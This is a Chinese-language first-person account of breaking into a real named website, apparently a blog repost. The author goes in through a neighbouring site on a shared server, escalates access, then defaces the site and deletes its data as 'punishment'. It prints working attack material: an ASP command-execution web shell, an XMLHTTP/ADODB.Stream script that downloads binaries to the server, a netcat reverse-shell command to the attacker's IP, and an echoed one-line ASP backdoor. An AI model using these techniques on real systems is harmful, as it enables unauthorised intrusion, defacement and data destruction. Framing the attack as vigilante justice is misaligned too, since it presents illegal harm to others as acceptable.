最近在網(wǎng)上老是看到有人說被一個網(wǎng)址為“http://www.xuehk.com”的黑客培訓機構騙了錢，而且騙取的金額數(shù)目可不少。于是，抱著為民除 害的心態(tài)，準備對這個所謂的黑客培訓機構進行一次滲透。在網(wǎng)上搜索了一些關于這個網(wǎng)站的資料，得知，這個網(wǎng)站在前不久已經(jīng)被人黑過了，如果現(xiàn)在還要再次入 侵的話，成功的幾率可能比小，于是就叫上了幾個朋友一起搞。
打開“http://www.xuehk.com”，發(fā)現(xiàn)網(wǎng)站的頁面幾乎都是靜態(tài)的，如圖1所示。



整理好思路后，我決定先從主站入手。用阿D和明小子注入工具進行了一次注入點掃面，結果無功而返，但這是我意料之中的事。然后，我變了一下思路，花了10多分鐘搜集齊了www.xuehk.com的所有目錄，目錄如下：
http://www.xuehk.com/
http://www.xuehk.com/book/
http://www.xuehk.com/vip/
http://www.xuehk.com/pojie/
http://www.xuehk.com/js/
http://www.xuehk.com/xz/
http://www.xuehk.com/zs/
http://www.xuehk.com/shop/
http://www.xuehk.com/yewu/
http://www.xuehk.com/zs/photo/xiao/
http://www.xuehk.com/zs/photo/da/
http://www.xuehk.com/zs/photo/
我分別用網(wǎng)站獵手和明小子注入工具的批量掃描功能對這些目錄進行后臺掃描，然后我又用我自己加強過的NBSI一個一個的掃，結果依然是無功而返?？磥韽闹?站入手是幾乎沒可能的了，于是乎開始旁注。打開“http://www.114best.com/ip/”對xuehk進行旁注查詢，發(fā)現(xiàn)服務器上有很多 網(wǎng)站，很快我就找到了一個有漏洞的網(wǎng)站，如但是由于服務器安裝了比較強的殺軟，所以我只拿到了一個一句話webshell，圖2所示。



把 webshell丟給朋友后，我用lake2的一句話木馬客戶端查看了一下服務器信息，webshell所在的網(wǎng)站根目錄為“F:\wwwroot \****\wwwroot\”，****為網(wǎng)站域名的前段，所以，我推測xuehk.com的網(wǎng)站根目錄為“F:\wwwroot\xuehk \wwwroot\”，于是我馬上嘗試跳轉到此目錄，但是沒有權限。這時我想到asp.net的木馬權限可能會比asp的高一點，但是上傳好lake2的 asp.net一句話木馬后卻發(fā)現(xiàn)服務器不支持asp.net。
接著查看了一下終端信息，發(fā)現(xiàn)端口被改為了60015。查看了一下第三方軟件的信息，結果serv-u路徑找不到，而且默認密碼改了，服務器上沒有安裝 PcanyWhere和Radmin，MSSQL和Mysql也沒有安裝，仔細再找了一下，也沒有發(fā)現(xiàn)什么可利用的第三方軟件，而且服務器的權限設置得很 死，連“開始→程序”都打不開。
上傳cmd.asp準備嘗試執(zhí)行命令，但cmd.asp也被服務器的殺毒軟件給kill了，于是，自己操刀寫了個執(zhí)行cmd命令的asp腳本，代碼如下：



")
On Error Resume Next
response.write oScriptlhn.exec("cmd.exe /c" & request("c")).stdout.readall
response.write("")
response.write("")
response.write("
")
response.write("")
%>成功上傳到服務器后，執(zhí)行cmd.asp命令失敗。我想可能是管理員刪除了cmd.exe，也可能是服務器的權限設置問題，用一句話木馬查看服務器服務信 息發(fā)現(xiàn)Wscript并沒有被禁止，本想用Wscript來執(zhí)行命令，但是連一些能寫的目錄都找不到，常用的everyone目錄都不能用，至此，提權陷 入了死局。感覺沒什么意思，就跟朋友說了下情況出去玩了。
晚上回來的時候，朋友說找了N個小時，終于找到了一個能寫的目錄，目錄位置是“C:\Program Files\free3web~”，這著實嚇了我一跳，一個軟件的目錄居然能寫？打開這個目錄看了看，不知道是什么東西，就擱在了一邊。準備把cmd上傳 到服務器的時候我又發(fā)現(xiàn)了一個問題，就是我該如何把二進制文件傳上服務器呢？一句話木馬只支持文本上傳。有的朋友可能說用Wget.vbs來下載，但是你 想想，我們該怎么執(zhí)行命令讓Wget.vbs去下載文件呢？經(jīng)過一會兒的思考，我終于想到了一個辦法，不能上傳，但能下載吧？于是我在網(wǎng)上找到了一個可行 的辦法，就是利用Microsoft.XMLHTTP來下載文件到服務器上。我們先把cmd.exe傳上自己的網(wǎng)站上（為了減少體積，我用FSG壓縮了 cmd.exe?。缓蟠蜷_一句話木馬客戶端增強版，填好一句話木馬的信息后，把第三個框清空，再把第二個框的代碼換成：
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","被下載文件的網(wǎng)址",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("保存的文件名"),2
set sGet = nothing
set sPOST = nothing
response.Write("下載成功！")再點擊“GO”按鈕后，一會兒文件就會被下載到服務器上了，如圖3、4所示。



上傳好cmd.exe后，在我剛才寫的cmd.asp腳本的代碼中把“cmd.exe”改為“C:\Program Files\free3web~\cmd.exe”，嘗試著執(zhí)行了一下命令，發(fā)現(xiàn)執(zhí)行成功！看來不需要用Wscript來執(zhí)行命令了，如圖5所示。



用 dir命令想查看F盤的文件，但是沒有權限，真是郁悶死我了，能執(zhí)行命令但又沒有利用價值，于是我就準備在網(wǎng)上查一些關于服務器提權的文章，看看別人的提 權思路。誰知我無意中看到一篇關于webshell下nc反彈的權限討論，仔細看過討論后得知原來用nc反彈回來的shell權限是比webshell權限高的！于是我馬上弄了一個我免殺過的nc到服務器上，在本地打開cmd，輸入命令“nc -vv -l -p 2006”，然后在webshell中輸入“c:\Program~\freeweb\nc.exe -e c:\Program~\freeweb\cmd.exe 我的IP 2006”，一會兒nc就有回應了，我嘗試執(zhí)行命令“net user aa aa /add”，結果失敗，證明權限不是system，但當我用命令“dir F:\wwwroot\xuehk\wwwroot\”的時候，居然成功的列出了xuehk.com網(wǎng)站的所有文件，如圖6所示。



然后我試著用echo命令來在xuehk.com寫一個文件，輸入
echo H4cked by 落葉紛飛>luoye.txt成功寫入了xuehk.com的網(wǎng)站根目錄，如圖7所示。



現(xiàn)在來echo一個一句話木馬吧！輸入
echo ^execute request^("l"^)^>luoye.asp成 功寫入luoye.asp，但因為服務器屏蔽了asp調試錯誤的信息，所以打開luoye.asp時返回的頁面是500內部錯誤，但是這并不影響一句話木 馬的使用，我用lake2的一句話木馬客戶端連接上xuehk.com的一句話木馬后，用它的“Edit TextFile”功能把xuehk.com的首頁文件index.asp替換成了黑頁，并且在nc反彈回來的shell中將其數(shù)據(jù)完全刪除掉了，也算是 給他們一個小小的教訓吧！總的來說，這次入侵的目的還是達到了。

版權聲明：本站文章來源標注為YINGSOO的內容版權均為本站所有，歡迎引用、轉載，請保持原文完整并注明來源及原文鏈接。禁止復制或仿造本網(wǎng)站，禁止在非www.sddonglingsh.com所屬的服務器上建立鏡像，否則將依法追究法律責任。本站部分內容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來，僅供學習參考，不代表本站立場，如有內容涉嫌侵權，請聯(lián)系alex-e#qq.com處理。